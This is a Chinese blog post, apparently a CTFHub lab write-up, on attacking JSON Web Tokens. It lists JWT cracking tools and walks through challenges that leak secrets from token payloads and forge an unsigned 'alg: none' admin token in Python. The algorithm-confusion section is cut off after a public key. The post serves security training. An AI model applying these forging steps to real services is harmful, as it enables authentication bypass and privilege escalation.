jwt渗透与防御

最新推荐文章于 2025-06-26 09:28:02 发布
最新推荐文章于 2025-06-26 09:28:02 发布
阅读量1.1k 收藏 7
点赞数 14
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/maogs/article/details/143828120

jwt的概念

JWT(英文全称:JSON Web Token)

是一个开放标准(RFC 7519),用于在双方之间安全地表示声明。一种无状态的认证机制,通常用于授权和信息交换。

是目前 最流行的跨域认证解决方案。

破解JWT的工具

1、jwt_tool(git clone https://github.com/ticarpi/jwt_tool)

可以用来验证、伪造和破解JWT令牌。

2、jwt-cracker

该工具仅限于单一的签名算法(HS256) ,如果提供了不同的签名算法,则无法进行操作

https://github.com/lmammino/jwt-cracker

3、c-jwt-cracker

同样是暴力破解 JWT 私钥的工具。

https://github.com/brendan-rius/c-jwt-cracker

jwt_tool

$ git clone https://github.com/ticarpi/jwt_tool

$ python3 -m pip install termcolor cprint pycryptodomex requests

pip3 install pycryptodome

python jwt_tool.py -h

python jwt_tool.py -h

在线靶场

BurpSuiteplugins

https://github.com/portswigger/json-web-token-attacker

https://github.com/portswigger/json-web-tokens

CTFHUB案例

注册账号

CTFHub

敏感信息泄露

Token header values:

[+] AG = "560f185c7efa1e2}"

[+] typ = "JWT"

[+] alg = "HS256"

Token payload values:

[+] username = "admin"

[+] password = "12345"

[+] FL = "ctfhub{fdf982747"

ctfhub{fdf982747560f185c7efa1e2}

无签名

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMzIxIiwicm9sZSI6Imd1ZXN0In0.Vhl8hp3YyaCSkSejBoSPPMiXOPd23JZl6knLx1h3svQ

Original JWT:

=====================

Decoded Token Values:

=====================

Token header values:

[+] typ = "JWT"

[+] alg = "HS256"

Token payload values:

[+] username = "admin"

[+] password = "1321"

[+] role = "guest"

----------------------

JWT common timestamps:

iat = IssuedAt

exp = Expires

nbf = NotBefore

----------------------

{"typ":"JWT","alg":"none"}

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMzIxIiwicm9sZSI6Imd1ZXN0In0

└─# python

Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux

Type "help", "copyright", "credits" or "license" for more information.

>>> import jwt

>>> encoded = jwt.encode({"username":"admin","password":"admin","role":"admin"},'',algorithm=none)

Traceback (most recent call last):

File "", line 1, in

NameError: name 'none' is not defined. Did you mean: 'None'?

>>> encoded = jwt.encode({"username":"admin","password":"admin","role":"admin"},'',algorithm='none')

>>> encoded

'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.'

>>>

KeyboardInterrupt

>>>

ctfhub{0c6165771c79d0eca7471f01}

修改签名算法

ctfhub:https://www.ctfhub.com

所需金币:50题目状态:已解出解题奖励:金币:50 经验:10

有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。

http://challenge-f0f009b84767443f.sandbox.ctfhub.com:10800

-----BEGIN PUBLIC KEY-----

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAx5MzhtMkwT8oIG0o+Spr

RxepmdFveFsI+haEX6eMZ68foi6v/l+2gFSLkCkVH1f+EIYx5G6m0jvQcmiml66m

P2GjeJIoArU3FLOGSIdBExXySMYuLZZNSvxNyHeZvEOGlQQBn4+StrUYuMqG7ZpO

LExz91UPvZZ/sSpzbpYV31S+KSz238ZAMx6ZPt9V7JuOlydUZ3s6/RgCMBekCbpn

Lr/z5cYWvvIFSgP43uxSap9Aqvm6TFICwPFzHoti/vNNDjkVadD0kFKGu01yBLMz

hdjMyC5eqZftWgScWCggCobfI/nAG2kmfgSgE3qs2pNsdaoRoPmkxwA+ZOqEcMow

FwIDAQAB

-----END PUBLIC KEY-----

观浩
关注
JWT渗透攻防(一)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-24 2025
Json web token (JWT)相关漏洞对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等,在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名。
JWT渗透攻防(二)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-24 2681
我们在之前的文章中已经讲解过了JWT漏洞相关的原理和利用,今天我们就通过这篇文章再来了解一下JWT的漏洞。
加菲工具 JWT 在线解密:轻松查看 JWT 信息
01-17 2056
加菲工具 JWT 在线解密:轻松查看 JWT 信息(www.orcc.top)
JWT加密以及解密工具类(简洁版)
alan_liuyue的博客
03-22 1万+
简介 JWT,JSON WEB TOKEN,是一种用于双方之间传递安全信息的简洁的、URL安全的表述性声明规范; 该工具类可快速实现jwt秘钥的加密和解密,适用于初学者快速入手; 项目实践 package com.sixmonth.micro.serv.page.common.jwt; import java.util.Date; import javax.crypto.Secret...
JWT token 的生成和解析
edwardwzw的博客
05-24 1181
前面章节我们已经讨论了,其中有一个重要的环节就是后端token的生成。本章节我们将针对token生成的过程和原理逐一讲述。
JWT在线解密/JWT在线解码 - 加菲工具
04-01 1万+
JWT在线解密/JWT在线解码 地址:https://www.orcc.top/tools/jwt
Json web token (JWT)渗透防御及ctf例题
weixin_65582330的博客
03-06 1904
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
JWT(Json Web Token)的原理、渗透防御
ElsonHY的博客
05-16 2654
JWT(Json Web Token)的原理、渗透防御
JWT渗透姿势一篇通
Javachichi的博客
02-15 1327
JWT(JSON Web Token)是一种用于身份认证和授权的开放标准,它通过在网络应用间传递被加密的JSON数据来安全地传输信息使得身份验证和授权变得更加简单和安全,JWT对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键而且还被视为隐藏了通往以下特权的途径,例如:特权升级、信息泄露、SQLi、XSS、SSRF、RCE、LFI等。
渗透测试-JWT攻击
cdyunaq的博客
01-18 6442
1.jwt是什么 Json web token(JWT),是为了在网络应用环境间传递声明而执行的一中基于JSON的开放标准。常用于分布式站点的单点登录。 JWT的声明一般被用在客户端服务端之间传递身份认证信息,便于向服务端请求资源。 1.1.原理 1)客户端提交用户名密码等信息到服务端请求登录,服务端在验证通过后前发一个具有时效性的token,将token返回给客户端 2)客户端收到token后会将token存储在cookie或localStorage中 3)随后客户端每次请求都会携带这个to
Authentication Lab - Cracking JWT Keys-优快云博客.pdf
10-09
由于 优快云 平台的发文限制,没办法,笔者只好...使用场景及目标:指导攻防人员学会JWT的工作机制、密钥爆破方法和防御措施的设计实施。 其他说明:提供了多种复杂度不同的攻击示例,能够适应不同技术水平的安全爱好者。
Jwt.zip_jwt_oauth2.0_oauth2.0 加解密_php解密工具
09-14
oauth2.0核心加解密工具,里面有详细说明
JWT web token
04-26
NULL 博文链接:https://15609845237.iteye.com/blog/2367346
整理渗透测试安全开发相关的网站,将其收录到浏览器书签中.zip
11-29
渗透测试安全开发的学习工作中,资源的有效整合和利用是提高工作效率的关键。本压缩包收录的是一系列渗透测试和安全开发相关的网站,这些网站涵盖了工具下载、漏洞数据库、安全资讯、论坛交流等多个方面,为...
JWT实现漏洞在后端服务中的扫描
最新发布
大厂资深架构师
06-26 961
JWT的核心机制常见漏洞类型(如None算法绕过、弱密钥攻击)漏洞扫描的具体方法(手动测试+自动化工具)实战案例演示(从漏洞复现到修复)企业级扫描策略未来趋势本文采用“原理→漏洞→扫描→实战”的递进结构,先拆解JWT的核心机制,再分析常见漏洞的触发条件,接着讲解扫描技术,最后通过真实案例演示全流程。JWT:JSON Web Token,基于JSON的开放标准(RFC 7519),用于在网络间安全传输声明(Claims)。签名算法。
JWT渗透测试(非常详细)从零基础入门到精通,看完这一篇就够了_看雪jwt测试
2401_84563438的博客
05-16 819
欺骗远程JWKS:生成新的RSA密钥对,将提供的URL注入令牌,将公共密钥导出为JSON Web密钥存储对象(以提供的URL进行服务)并使用私钥对令牌签名。#生成一个新的RSA密钥对,将公钥作为JSON Web密钥存储对象注入令牌并使用私钥对令牌签名。#处理JSON Web密钥存储文件,重建公共密钥,然后测试密钥以查看验证令牌的密钥。#尝试使用已知的公钥对不对称密码(RS-,EC-,PS-)进行"密钥混淆"攻击。#尝试使用"无"算法来创建未验证的令牌。#尝试破解密钥(HMAC算法)
JWT Tool: 解析生成JWT的强大工具
gitblog_00070的博客
03-21 2153
JWT Tool: 解析生成JWT的强大工具 项目地址:https://gitcode.com/gh_mirrors/jw/jwt_tool 是一个简洁而强大的在线工具,专门用于JSON Web Token(JWT)的解析和生成。对于开发人员来说,它是一个极其有用的资源,可以帮助理解、测试和调试JWT在身份验证和授权过程中的工作原理。 技术分析 JWT Tool 使用Web技术构建,包括HTML...
JWT详解(文章内嵌jwt工具类)
我认不到你的博客
11-17 4830
JWT (JSON Web Token) 是目前最流行的跨域认证解决方案,是一种基于 Token 的认证授权机制。从 JWT 的全称可以看出,JWT 本身也是 Token,一种规范化之后的 JSON 结构的 Token。JWT 自身包含了身份验证所需要的所有信息,因此,我们的服务器不需要存储 Session 信息。这显然增加了系统的可用性和伸缩性,大大减轻了服务端的压力。
在线JWT Token解析解码
热门推荐
Linux,Java,SpringBoot,Python,Lua略知一点
04-26 4万+
JWTToken在线解析解码 JWTToken在线解析解码 JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案。本工具提供在线解码的功能 JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案。本工具提供在线解码的功能 JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案。本工具提供在线解码的功能 https://tooltt.com/jwt-decode/ ...
全面掌握Web安全渗透技术:中国菜教程
从基础到高级,本教程旨在教授学员们如何识别和利用Web应用中的安全漏洞,以及如何在实际环境中进行渗透测试和防御。 1. **Web安全基础** - 网络安全的基本概念和重要性。 - 常见的网络攻击类型,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值